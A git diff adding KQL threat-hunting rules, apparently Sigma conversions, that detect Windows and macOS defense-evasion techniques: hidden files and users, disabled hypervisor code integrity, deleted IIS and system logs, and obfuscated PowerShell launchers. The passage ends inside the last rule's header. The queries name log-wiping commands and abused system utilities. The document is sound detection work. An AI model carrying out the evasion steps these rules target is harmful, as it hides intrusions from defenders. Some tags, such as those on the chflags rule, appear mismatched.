mode 100644 index 00000000..5c14fe30 --- /dev/null +++ b/KQL/rules/Defense Evasion/hidden_flag_set_on_file_directory_via_chflags_macos.kql @@ -0,0 +1,14 @@ +// Title: Hidden Flag Set On File/Directory Via Chflags - MacOS +// Author: Omar Khaled (@beacon_exe) +// Date: 2024-08-21 +// Level: medium +// Description: Detects the execution of the "chflags" utility with the "hidden" flag, in order to hide files on MacOS. +When a file or directory has this hidden flag set, it becomes invisible to the default file listing commands and in graphical file browsers. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.credential-access, attack.command-and-control, attack.t1218, attack.t1564.004, attack.t1552.001, attack.t1105 +// False Positives: +// - Legitimate usage of chflags by administrators and users. + +DeviceProcessEvents +| where ProcessCommandLine contains "hidden " and FolderPath endswith "/chflags" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hidden_user_creation.kql b/KQL/rules/Defense Evasion/hidden_user_creation.kql new file mode 100644 index 00000000..90195830 --- /dev/null +++ b/KQL/rules/Defense Evasion/hidden_user_creation.kql @@ -0,0 +1,12 @@ +// Title: Hidden User Creation +// Author: Daniil Yugoslavskiy, oscd.community +// Date: 2020-10-10 +// Level: medium +// Description: Detects creation of a hidden user account on macOS (UserID < 500) or with IsHidden option +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.002 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where ((ProcessCommandLine contains "create" and FolderPath endswith "/dscl") and (ProcessCommandLine contains "UniqueID" and ProcessCommandLine matches regex "([0-9]|[1-9][0-9]|[1-4][0-9]{2})")) or ((ProcessCommandLine contains "create" and FolderPath endswith "/dscl") and (ProcessCommandLine contains "IsHidden" and (ProcessCommandLine contains "true" or ProcessCommandLine contains "yes" or ProcessCommandLine contains "1"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hide_schedule_task_via_index_value_tamper.kql b/KQL/rules/Defense Evasion/hide_schedule_task_via_index_value_tamper.kql new file mode 100644 index 00000000..cc4ed67a --- /dev/null +++ b/KQL/rules/Defense Evasion/hide_schedule_task_via_index_value_tamper.kql @@ -0,0 +1,14 @@ +// Title: Hide Schedule Task Via Index Value Tamper +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-26 +// Level: high +// Description: Detects when the "index" value of a scheduled task is modified from the registry +Which effectively hides it from any tooling such as "schtasks /query" (Read the referenced link for more information about the effects of this technique) + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562 +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree*" and RegistryKey contains "Index") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hiding_files_with_attrib_exe.kql b/KQL/rules/Defense Evasion/hiding_files_with_attrib_exe.kql new file mode 100644 index 00000000..330fa07c --- /dev/null +++ b/KQL/rules/Defense Evasion/hiding_files_with_attrib_exe.kql @@ -0,0 +1,13 @@ +// Title: Hiding Files with Attrib.exe +// Author: Sami Ruohonen +// Date: 2019-01-16 +// Level: medium +// Description: Detects usage of attrib.exe to hide files from users. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.001 +// False Positives: +// - IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe) +// - Msiexec.exe hiding desktop.ini + +DeviceProcessEvents +| where (ProcessCommandLine contains " +h " and (FolderPath endswith "\\attrib.exe" or ProcessVersionInfoOriginalFileName =~ "ATTRIB.EXE")) and (not(ProcessCommandLine contains "\\desktop.ini ")) and (not((ProcessCommandLine =~ "+R +H +S +A \\*.cui" and InitiatingProcessCommandLine =~ "C:\\WINDOWS\\system32\\*.bat" and InitiatingProcessFolderPath endswith "\\cmd.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key.kql b/KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key.kql new file mode 100644 index 00000000..e0df0a0f --- /dev/null +++ b/KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key.kql @@ -0,0 +1,10 @@ +// Title: Hiding User Account Via SpecialAccounts Registry Key +// Author: Nasreddine Bencherchali (Nextron Systems), frack113 +// Date: 2022-07-12 +// Level: high +// Description: Detects modifications to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.002 + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key_commandline.kql b/KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key_commandline.kql new file mode 100644 index 00000000..c4871a93 --- /dev/null +++ b/KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key_commandline.kql @@ -0,0 +1,13 @@ +// Title: Hiding User Account Via SpecialAccounts Registry Key - CommandLine +// Author: @Kostastsale, TheDFIRReport +// Date: 2022-05-14 +// Level: medium +// Description: Detects changes to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.002 +// False Positives: +// - System administrator activities + +DeviceProcessEvents +| where (ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList" and ProcessCommandLine contains "add" and ProcessCommandLine contains "/v" and ProcessCommandLine contains "/d 0") and FolderPath endswith "\\reg.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/html_help_hh_exe_suspicious_child_process.kql b/KQL/rules/Defense Evasion/html_help_hh_exe_suspicious_child_process.kql new file mode 100644 index 00000000..09522f85 --- /dev/null +++ b/KQL/rules/Defense Evasion/html_help_hh_exe_suspicious_child_process.kql @@ -0,0 +1,10 @@ +// Title: HTML Help HH.EXE Suspicious Child Process +// Author: Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems) +// Date: 2020-04-01 +// Level: high +// Description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.initial-access, attack.t1047, attack.t1059.001, attack.t1059.003, attack.t1059.005, attack.t1059.007, attack.t1218, attack.t1218.001, attack.t1218.010, attack.t1218.011, attack.t1566, attack.t1566.001 + +DeviceProcessEvents +| where (FolderPath endswith "\\CertReq.exe" or FolderPath endswith "\\CertUtil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\installutil.exe" or FolderPath endswith "\\MSbuild.exe" or FolderPath endswith "\\MSHTA.EXE" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\hh.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hypervisor_enforced_code_integrity_disabled.kql b/KQL/rules/Defense Evasion/hypervisor_enforced_code_integrity_disabled.kql new file mode 100644 index 00000000..3452769e --- /dev/null +++ b/KQL/rules/Defense Evasion/hypervisor_enforced_code_integrity_disabled.kql @@ -0,0 +1,11 @@ +// Title: Hypervisor Enforced Code Integrity Disabled +// Author: Nasreddine Bencherchali (Nextron Systems), Anish Bogati +// Date: 2023-03-14 +// Level: high +// Description: Detects changes to the HypervisorEnforcedCodeIntegrity registry key and the "Enabled" value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker to load unsigned and untrusted code to be run in the kernel + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\Microsoft\\Windows\\DeviceGuard\\HypervisorEnforcedCodeIntegrity" or RegistryKey endswith "\\Control\\DeviceGuard\\HypervisorEnforcedCodeIntegrity" or RegistryKey endswith "\\Control\\DeviceGuard\\Scenarios\\HypervisorEnforcedCodeIntegrity\\Enabled") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/hypervisor_enforced_paging_translation_disabled.kql b/KQL/rules/Defense Evasion/hypervisor_enforced_paging_translation_disabled.kql new file mode 100644 index 00000000..916a2541 --- /dev/null +++ b/KQL/rules/Defense Evasion/hypervisor_enforced_paging_translation_disabled.kql @@ -0,0 +1,11 @@ +// Title: Hypervisor Enforced Paging Translation Disabled +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-07-05 +// Level: high +// Description: Detects changes to the "DisableHypervisorEnforcedPagingTranslation" registry value. Where the it is set to "1" in order to disable the Hypervisor Enforced Paging Translation feature. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\DisableHypervisorEnforcedPagingTranslation" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols.kql b/KQL/rules/Defense Evasion/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols.kql new file mode 100644 index 00000000..a7f6164b --- /dev/null +++ b/KQL/rules/Defense Evasion/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols.kql @@ -0,0 +1,11 @@ +// Title: IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols +// Author: Nasreddine Bencherchali (Nextron Systems), Michael Haag (idea) +// Date: 2023-09-05 +// Level: high +// Description: Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceRegistryEvents +| where RegistryValueData contains "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults" and (RegistryKey endswith "\\http" or RegistryKey endswith "\\https") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/iis_webserver_access_logs_deleted.kql b/KQL/rules/Defense Evasion/iis_webserver_access_logs_deleted.kql new file mode 100644 index 00000000..3abdf710 --- /dev/null +++ b/KQL/rules/Defense Evasion/iis_webserver_access_logs_deleted.kql @@ -0,0 +1,13 @@ +// Title: IIS WebServer Access Logs Deleted +// Author: Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-16 +// Level: medium +// Description: Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070 +// False Positives: +// - During uninstallation of the IIS service +// - During log rotation + +DeviceFileEvents +| where FolderPath contains "\\inetpub\\logs\\LogFiles\\" and FolderPath endswith ".log" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/iis_webserver_log_deletion_via_commandline_utilities.kql b/KQL/rules/Defense Evasion/iis_webserver_log_deletion_via_commandline_utilities.kql new file mode 100644 index 00000000..0ce16f72 --- /dev/null +++ b/KQL/rules/Defense Evasion/iis_webserver_log_deletion_via_commandline_utilities.kql @@ -0,0 +1,15 @@ +// Title: IIS WebServer Log Deletion via CommandLine Utilities +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-09-02 +// Level: medium +// Description: Detects attempts to delete Internet Information Services (IIS) log files via command line utilities, which is a common defense evasion technique used by attackers to cover their tracks. +Threat actors often abuse vulnerabilities in web applications hosted on IIS servers to gain initial access and later delete IIS logs to evade detection. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070 +// False Positives: +// - Deletion of IIS logs that are older than a certain retention period as part of regular maintenance activities. +// - Legitimate schedule tasks or scripts that clean up log files regularly. + +DeviceProcessEvents +| where (ProcessCommandLine contains "del " or ProcessCommandLine contains "erase " or ProcessCommandLine contains "rm " or ProcessCommandLine contains "remove-item " or ProcessCommandLine contains "rmdir ") and ProcessCommandLine contains "\\inetpub\\logs\\" and ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("cmd.exe", "powershell.exe", "powershell_ise.exe", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/imagingdevices_unusual_parent_child_processes.kql b/KQL/rules/Defense Evasion/imagingdevices_unusual_parent_child_processes.kql new file mode 100644 index 00000000..e029eef4 --- /dev/null +++ b/KQL/rules/Defense Evasion/imagingdevices_unusual_parent_child_processes.kql @@ -0,0 +1,10 @@ +// Title: ImagingDevices Unusual Parent/Child Processes +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-27 +// Level: high +// Description: Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\ImagingDevices.exe" or (FolderPath endswith "\\ImagingDevices.exe" and (InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/indicator_removal_on_host_clear_mac_system_logs.kql b/KQL/rules/Defense Evasion/indicator_removal_on_host_clear_mac_system_logs.kql new file mode 100644 index 00000000..df92991d --- /dev/null +++ b/KQL/rules/Defense Evasion/indicator_removal_on_host_clear_mac_system_logs.kql @@ -0,0 +1,12 @@ +// Title: Indicator Removal on Host - Clear Mac System Logs +// Author: remotephone, oscd.community +// Date: 2020-10-11 +// Level: medium +// Description: Detects deletion of local audit logs +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.002 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where (FolderPath endswith "/rm" or FolderPath endswith "/unlink" or FolderPath endswith "/shred") and (ProcessCommandLine contains "/var/log" or (ProcessCommandLine contains "/Users/" and ProcessCommandLine contains "/Library/Logs/")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/indirect_command_execution_by_program_compatibility_wizard.kql b/KQL/rules/Defense Evasion/indirect_command_execution_by_program_compatibility_wizard.kql new file mode 100644 index 00000000..87b18b56 --- /dev/null +++ b/KQL/rules/Defense Evasion/indirect_command_execution_by_program_compatibility_wizard.kql @@ -0,0 +1,13 @@ +// Title: Indirect Command Execution By Program Compatibility Wizard +// Author: A. Sungurov , oscd.community +// Date: 2020-10-12 +// Level: low +// Description: Detect indirect command execution via Program Compatibility Assistant pcwrun.exe +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, attack.execution +// False Positives: +// - Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts +// - Legit usage of scripts + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\pcwrun.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/indirect_command_execution_from_script_file_via_bash_exe.kql b/KQL/rules/Defense Evasion/indirect_command_execution_from_script_file_via_bash_exe.kql new file mode 100644 index 00000000..cb39c703 --- /dev/null +++ b/KQL/rules/Defense Evasion/indirect_command_execution_from_script_file_via_bash_exe.kql @@ -0,0 +1,12 @@ +// Title: Indirect Command Execution From Script File Via Bash.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-15 +// Level: medium +// Description: Detects execution of Microsoft bash launcher without any flags to execute the content of a bash script directly. +This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1202 + +DeviceProcessEvents +| where ((FolderPath endswith ":\\Windows\\System32\\bash.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\bash.exe") or ProcessVersionInfoOriginalFileName =~ "Bash.exe") and (not(((ProcessCommandLine contains "bash.exe -" or ProcessCommandLine contains "bash -") or ProcessCommandLine =~ "" or isnull(ProcessCommandLine) or (ProcessCommandLine in~ ("bash.exe", "bash"))))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/indirect_inline_command_execution_via_bash_exe.kql b/KQL/rules/Defense Evasion/indirect_inline_command_execution_via_bash_exe.kql new file mode 100644 index 00000000..2a946f9e --- /dev/null +++ b/KQL/rules/Defense Evasion/indirect_inline_command_execution_via_bash_exe.kql @@ -0,0 +1,12 @@ +// Title: Indirect Inline Command Execution Via Bash.EXE +// Author: frack113 +// Date: 2021-11-24 +// Level: medium +// Description: Detects execution of Microsoft bash launcher with the "-c" flag. +This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1202 + +DeviceProcessEvents +| where ProcessCommandLine contains " -c " and ((FolderPath endswith ":\\Windows\\System32\\bash.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\bash.exe") or ProcessVersionInfoOriginalFileName =~ "Bash.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/infdefaultinstall_exe_inf_execution.kql b/KQL/rules/Defense Evasion/infdefaultinstall_exe_inf_execution.kql new file mode 100644 index 00000000..5f43d093 --- /dev/null +++ b/KQL/rules/Defense Evasion/infdefaultinstall_exe_inf_execution.kql @@ -0,0 +1,10 @@ +// Title: InfDefaultInstall.exe .inf Execution +// Author: frack113 +// Date: 2021-07-13 +// Level: medium +// Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents +| where ProcessCommandLine contains "InfDefaultInstall.exe " and ProcessCommandLine contains ".inf" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/insensitive_subfolder_search_via_findstr_exe.kql b/KQL/rules/Defense Evasion/insensitive_subfolder_search_via_findstr_exe.kql new file mode 100644 index 00000000..73f5e3d7 --- /dev/null +++ b/KQL/rules/Defense Evasion/insensitive_subfolder_search_via_findstr_exe.kql @@ -0,0 +1,13 @@ +// Title: Insensitive Subfolder Search Via Findstr.EXE +// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems) +// Date: 2020-10-05 +// Level: low +// Description: Detects execution of findstr with the "s" and "i" flags for a "subfolder" and "insensitive" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.credential-access, attack.command-and-control, attack.t1218, attack.t1564.004, attack.t1552.001, attack.t1105 +// False Positives: +// - Administrative or software activity + +DeviceProcessEvents +| where (ProcessCommandLine contains "findstr" or FolderPath endswith "findstr.exe" or ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE") and ((ProcessCommandLine contains " -i " or ProcessCommandLine contains " /i " or ProcessCommandLine contains " –i " or ProcessCommandLine contains " —i " or ProcessCommandLine contains " ―i ") and (ProcessCommandLine contains " -s " or ProcessCommandLine contains " /s " or ProcessCommandLine contains " –s " or ProcessCommandLine contains " —s " or ProcessCommandLine contains " ―s ")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/install_new_package_via_winget_local_manifest.kql b/KQL/rules/Defense Evasion/install_new_package_via_winget_local_manifest.kql new file mode 100644 index 00000000..0c3c6c61 --- /dev/null +++ b/KQL/rules/Defense Evasion/install_new_package_via_winget_local_manifest.kql @@ -0,0 +1,15 @@ +// Title: Install New Package Via Winget Local Manifest +// Author: Sreeman, Florian Roth (Nextron Systems), frack113 +// Date: 2020-04-21 +// Level: medium +// Description: Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them. +The manifest option enables you to install an application by passing in a YAML file directly to the client. +Winget can be used to download and install exe, msi or msix files later. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1059 +// False Positives: +// - Some false positives are expected in some environment that may use this functionality to install and test their custom applications + +DeviceProcessEvents +| where (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe") and (ProcessCommandLine contains "install" or ProcessCommandLine contains " add ") and (ProcessCommandLine contains "-m " or ProcessCommandLine contains "--manifest") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/install_root_certificate.kql b/KQL/rules/Defense Evasion/install_root_certificate.kql new file mode 100644 index 00000000..e8e7381b --- /dev/null +++ b/KQL/rules/Defense Evasion/install_root_certificate.kql @@ -0,0 +1,12 @@ +// Title: Install Root Certificate +// Author: Ömer Günal, oscd.community +// Date: 2020-10-05 +// Level: low +// Description: Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1553.004 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where FolderPath endswith "/update-ca-certificates" or FolderPath endswith "/update-ca-trust" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/internet_explorer_disablefirstruncustomize_enabled.kql b/KQL/rules/Defense Evasion/internet_explorer_disablefirstruncustomize_enabled.kql new file mode 100644 index 00000000..b44c3773 --- /dev/null +++ b/KQL/rules/Defense Evasion/internet_explorer_disablefirstruncustomize_enabled.kql @@ -0,0 +1,13 @@ +// Title: Internet Explorer DisableFirstRunCustomize Enabled +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-16 +// Level: medium +// Description: Detects changes to the Internet Explorer "DisableFirstRunCustomize" value, which prevents Internet Explorer from running the first run wizard the first time a user starts the browser after installing Internet Explorer or Windows. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - As this is controlled by group policy as well as user settings. Some false positives may occur. + +DeviceRegistryEvents +| where ((RegistryValueData in~ ("DWORD (0x00000001)", "DWORD (0x00000002)")) and RegistryKey endswith "\\Microsoft\\Internet Explorer\\Main\\DisableFirstRunCustomize") and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\ie4uinit.exe")))) and (not(((RegistryValueData contains "DWORD (0x00000001)" and (InitiatingProcessFolderPath contains "\\Temp\\" and InitiatingProcessFolderPath contains "\\.cr\\avira_")) or (RegistryValueData contains "DWORD (0x00000001)" and (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Foxit Software\\Foxit PDF Reader\\FoxitPDFReader.exe", "C:\\Program Files\\Foxit Software\\Foxit PDF Reader\\FoxitPDFReader.exe")))))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_clip_launcher.kql b/KQL/rules/Defense Evasion/invoke_obfuscation_clip_launcher.kql new file mode 100644 index 00000000..e80d4f9a --- /dev/null +++ b/KQL/rules/Defense Evasion/invoke_obfuscation_clip_launcher.kql @@ -0,0 +1,10 @@ +// Title: Invoke-Obfuscation CLIP+ Launcher +// Author: Jonathan Cheong, oscd.community +// Date: 2020-10-13 +// Level: high +// Description: Detects Obfuscated use of Clip.exe to execute PowerShell +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001 + +DeviceProcessEvents +| where (ProcessCommandLine contains "/c" or ProcessCommandLine contains "/r") and (ProcessCommandLine contains "cmd" and ProcessCommandLine contains "&&" and ProcessCommandLine contains "clipboard]::" and ProcessCommandLine contains "-f") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_compress_obfuscation.kql b/KQL/rules/Defense Evasion/invoke_obfuscation_compress_obfuscation.kql new file mode 100644 index 00000000..d1ec21ab --- /dev/null +++ b/KQL/rules/Defense Evasion/invoke_obfuscation_compress_obfuscation.kql @@ -0,0 +1,10 @@ +// Title: Invoke-Obfuscation COMPRESS OBFUSCATION +// Author: Timur Zinniatullin, oscd.community +// Date: 2020-10-18 +// Level: medium +// Description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001 + +DeviceProcessEvents +| where (ProcessCommandLine contains "system.io.compression.deflatestream" or ProcessCommandLine contains "system.io.streamreader" or ProcessCommandLine contains "readtoend(") and (ProcessCommandLine contains "new-object" and ProcessCommandLine contains "text.encoding]::ascii") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_obfuscated_iex_invocation.kql b/KQL/rules/Defense Evasion/invoke_obfuscation_obfuscated_iex_invocation.kql new file mode 100644 index 00000000..df6c48fa --- /dev/null +++ b/KQL/rules/Defense Evasion/invoke_obfuscation_obfuscated_iex_invocation.kql @@ -0,0 +1,10 @@ +// Title: Invoke-Obfuscation Obfuscated IEX Invocation +// Author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community +// Date: 2019-11-08 +// Level: high +// Description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001 + +DeviceProcessEvents +| where ProcessCommandLine matches regex "\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[" or ProcessCommandLine matches regex "\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[" or ProcessCommandLine matches regex "\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[" or ProcessCommandLine matches regex "\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}" or ProcessCommandLine matches regex "\\*mdr\\*\\W\\s*\\)\\.Name" or ProcessCommandLine matches regex "\\$VerbosePreference\\.ToString\\(" or ProcessCommandLine matches regex "\\[String\\]\\s*\\$VerbosePreference" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_stdin_launcher.kql b/KQL/rules/Defense Evasion/invoke_obfuscation_stdin_launcher.kql new file mode 100644 index 00000000..dfb4d941 --- /dev/null +++ b/KQL/rules/Defense Evasion/invoke_obfuscation_stdin_launcher.kql @@ -0,0 +1,10 @@ +// Title: Invoke-Obfuscation STDIN+ Launcher +// Author: Jonathan Cheong, oscd.community +// Date: 2020-10-15 +// Level: high +// Description: Detects Obfuscated use of stdin to execute PowerShell +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001 + +DeviceProcessEvents +| where ProcessCommandLine matches regex "cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\\"" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_var_launcher.kql b/KQL/rules/Defense Evasion/invoke_obfuscation_var_launcher.kql new file mode 100644 index 00000000..43b33d4b --- /dev/null +++ b/KQL/rules/Defense Evasion/invoke_obfuscation_var_launcher.kql @@ -0,0 +1,10 @@ +// Title: Invoke-Obfuscation VAR+ Launcher +// Author: Jonathan Cheong, oscd.community +// Date: 2020-10-15 +// Level: high +// Description: Detects Obfuscated use of Environment Variables to execute PowerShell +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001 + +DeviceProcessEvents +| where ProcessCommandLine matches regex "cmd.{0,5}(?:/c|/r)(?:\\s|)\\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\\"\\s+?\\-f(?:.*\\)){1,}.*\\"" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_var_launcher_obfuscation.kql b/KQL/rules/Defense Evasion/invoke_obfuscation_var_launcher_obfuscation.kql new file mode 100644 index 00000000..873f59b9 --- /dev/null +++ b/KQL/rules/Defense Evasion/invoke_obfuscation_var_launcher_obfuscation.kql @@ -0,0 +1,10 @@ +// Title: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION +// Author: Timur Zinniatullin, oscd.community +// Date: 2020-10-13 +// Level: high +// Description: Detects Obfuscated Powershell via VAR++ LAUNCHER +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001 + +DeviceProcessEvents +| where (ProcessCommandLine contains "{0}" or ProcessCommandLine contains "{1}" or ProcessCommandLine contains "{2}" or ProcessCommandLine contains "{3}" or ProcessCommandLine contains "{4}" or ProcessCommandLine contains "{5}") and (ProcessCommandLine contains "&&set" and ProcessCommandLine contains "cmd" and ProcessCommandLine contains "/c" and ProcessCommandLine contains "-f") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_via_stdin.kql b/KQL/rules/Defense Evasion/invoke_obfuscation_via_stdin.kql new file mode 100644 index 00000000..df58ebd7 --- /dev/null +++ b/KQL/rules/Defense Evasion/invoke_obfuscation_via_stdin.kql @@ -0,0 +1,10 @@ +// Title: Invoke-Obfuscation Via Stdin +// Author: Nikita Nazarov, oscd.community +// Date: 2020-10-12 +// Level: high +// 